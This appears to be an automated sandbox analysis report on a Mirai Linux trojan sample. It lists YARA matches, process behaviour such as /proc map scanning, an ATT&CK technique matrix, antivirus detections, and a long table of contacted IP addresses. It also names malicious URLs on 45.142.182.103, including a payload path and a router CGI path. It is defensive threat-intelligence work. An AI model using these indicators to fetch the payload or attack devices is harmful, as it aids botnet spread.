      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: classification engineClassification label: mal84.troj.linELF@0/0@0/0
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1582/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2033/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1612/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1579/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1699/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1335/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1698/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2028/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1334/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1576/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2025/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2146/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/910/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/912/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/517/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/759/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/918/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1594/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1349/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1623/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/761/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1622/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/884/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1983/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2038/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1344/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1465/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1586/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1860/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1463/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2156/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/800/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/801/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1629/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1627/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1900/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/491/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2050/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1877/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/772/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1633/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1599/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1632/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/774/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1477/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/654/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/896/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1476/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1872/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2048/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/655/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1475/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/656/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/777/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/657/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/658/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/419/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/936/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1639/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1638/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1809/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1494/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1890/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2063/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2062/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1888/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1886/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/420/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1489/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/785/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1642/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/788/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/667/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/789/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1648/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2078/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2077/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2074/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/670/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/793/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1656/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1654/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/674/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1532/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/796/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/675/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/797/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/676/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/677/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2069/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2102/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/799/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2080/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2084/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2083/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1668/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1664/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1389/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/840/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/720/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2114/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/721/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/1661/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/2079/mapsJump to behavior
      Source: /tmp/86O41HaCl5.elf (PID: 6220)File opened: /proc/847/mapsJump to behavior
      Source: /usr/bin/dash (PID: 6281)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.cQn9x2yAlZ /tmp/tmp.PRPRcDblVS /tmp/tmp.P0JqeoQ9qaJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 86O41HaCl5.elf, type: SAMPLE
      Source: Yara matchFile source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 86O41HaCl5.elf, type: SAMPLE
      Source: Yara matchFile source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
      Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
      File Deletion
      1
      OS Credential Dumping
      System Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Non-Standard Port
      SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
      Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Data Encrypted for ImpactDNS ServerEmail Addresses
      Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication3
      Application Layer Protocol
      Data DestructionVirtual Private ServerEmployee Names
      Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer2
      Ingress Tool Transfer
      Data Encrypted for ImpactServerGather Victim Network Information
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1365651 Sample: 86O41HaCl5.elf Startdate: 21/12/2023 Architecture: LINUX Score: 84 22 165.59.45.96 ZAMTELZM Zambia 2->22 24 64.134.111.188 WAYPORTUS United States 2->24 26 98 other IPs or domains 2->26 28 Snort IDS alert for network traffic 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 3 other signatures 2->34 8 86O41HaCl5.elf 2->8         started        10 dash rm 2->10         started        signatures3 process4 process5 12 86O41HaCl5.elf 8->12         started        process6 14 86O41HaCl5.elf 12->14         started        16 86O41HaCl5.elf 12->16         started        18 86O41HaCl5.elf 12->18         started        20 86O41HaCl5.elf 12->20         started       
      SourceDetectionScannerLabelLink
      86O41HaCl5.elf65%VirustotalBrowse
      86O41HaCl5.elf76%ReversingLabsLinux.Trojan.Mirai
      86O41HaCl5.elf100%AviraEXP/ELF.Mirai.Bot.Hua.d
      86O41HaCl5.elf100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://45.142.182.103:80/tmUnblock.cgitrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://45.142.182.103/bin86O41HaCl5.elffalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          62.105.89.54
          unknownUnited Kingdom
          5413AS5413GBfalse
          134.187.82.27
          unknownUnited States
          1226CTA-42-AS1226USfalse
          210.27.122.247
          unknownChina
          4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
          70.49.63.167
          unknownCanada
          577BACOMCAfalse
          94.127.213.176
          unknownJordan
          9038BAT-AS9038JOfalse
          42.163.127.173
          unknownChina
          4249LILLY-ASUSfalse
          68.132.186.153
          unknownUnited States
          701UUNETUSfalse
          8.145.236.26
          unknownSingapore
          37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
          118.65.22.11
          unknownChina
          4713OCNNTTCommunicationsCorporationJPfalse
          223.39.144.236
          unknownKorea Republic of
          9644SKTELECOM-NET-ASSKTelecomKRfalse
          50.210.56.2
          unknownUnited States
          7922COMCAST-7922USfalse
          72.245.30.69
          unknownUnited States
          18566MEGAPATH5-USfalse
          13.152.53.233
          unknownUnited States
          7018ATT-INTERNET4USfalse
          66.9.79.213
          unknownUnited States
          18885M2NGAGE2USfalse
          5.118.43.253
          unknownIran (ISLAMIC Republic Of)
          44244IRANCELL-ASIRfalse
          102.241.140.238
          unknownTunisia
          36926CKL1-ASNKEfalse
          38.140.102.25
          unknownUnited States
          11272TELEPAK-NETWORKS-INCUSfalse
          91.146.9.28
          unknownRussian Federation
          3226MARK-ITT-ASRUfalse
          53.125.154.140
          unknownGermany
          31399DAIMLER-ASITIGNGlobalNetworkDEfalse
          47.238.157.83
          unknownUnited States
          20115CHARTER-20115USfalse
          188.101.131.22
          unknownGermany
          3209VODANETInternationalIP-BackboneofVodafoneDEfalse
          71.100.23.213
          unknownUnited States
          701UUNETUSfalse
          86.163.72.2
          unknownUnited Kingdom
          2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
          157.139.31.177
          unknownUnited States
          20252JSIWMCUSfalse
          18.160.160.189
          unknownUnited States
          3MIT-GATEWAYSUSfalse
          47.51.66.64
          unknownUnited States
          20115CHARTER-20115USfalse
          128.227.72.91
          unknownUnited States
          6356NERDCNETUSfalse
          94.242.127.164
          unknownCzech Republic
          30764PODA-ASCZfalse
          37.99.130.168
          unknownSaudi Arabia
          47794ATHEEB-ASSAfalse
          94.193.8.129
          unknownUnited Kingdom
          5607BSKYB-BROADBAND-ASGBfalse
          186.72.186.102
          unknownPanama
          11556CableWirelessPanamaPAfalse
          48.50.188.192
          unknownUnited States
          2686ATGS-MMD-ASUSfalse
          60.121.97.190
          unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
          37.111.12.128
          unknownMyanmar
          133385TELENORMYANMAR-ASTelenorMyanmarMMfalse
          196.45.136.172
          unknownTanzania United Republic of
          32860CATS-NET-NETWORKTZfalse
          4.21.66.170
          unknownUnited States
          3356LEVEL3USfalse
          188.4.37.239
          unknownGreece
          1241FORTHNET-GRForthnetEUfalse
          79.163.53.86
          unknownPoland
          5617TPNETPLfalse
          134.100.204.102
          unknownGermany
          680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
          129.87.162.104
          unknownUnited States
          26577BAESYSTEMSUSfalse
          64.134.111.188
          unknownUnited States
          14654WAYPORTUSfalse
          105.15.211.60
          unknownSouth Africa
          37168CELL-CZAfalse
          185.46.45.203
          unknownRussian Federation
          48467PRANET-ASRUfalse
          167.234.70.183
          unknownUnited States
          3525ALBERTSONSUSfalse
          165.59.45.96
          unknownZambia
          37154ZAMTELZMfalse
          57.95.244.198
          unknownBelgium
          51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
          89.221.71.216
          unknownEstonia
          3249ESTPAKEEfalse
          32.71.25.104
          unknownUnited States
          2686ATGS-MMD-ASUSfalse
          94.153.184.233
          unknownUkraine
          15895KSNET-ASUAfalse
          142.35.86.163
          unknownCanada
          3633PROVINCE-OF-BRITISH-COLUMBIACAfalse
          212.36.111.43
          unknownUnited Kingdom
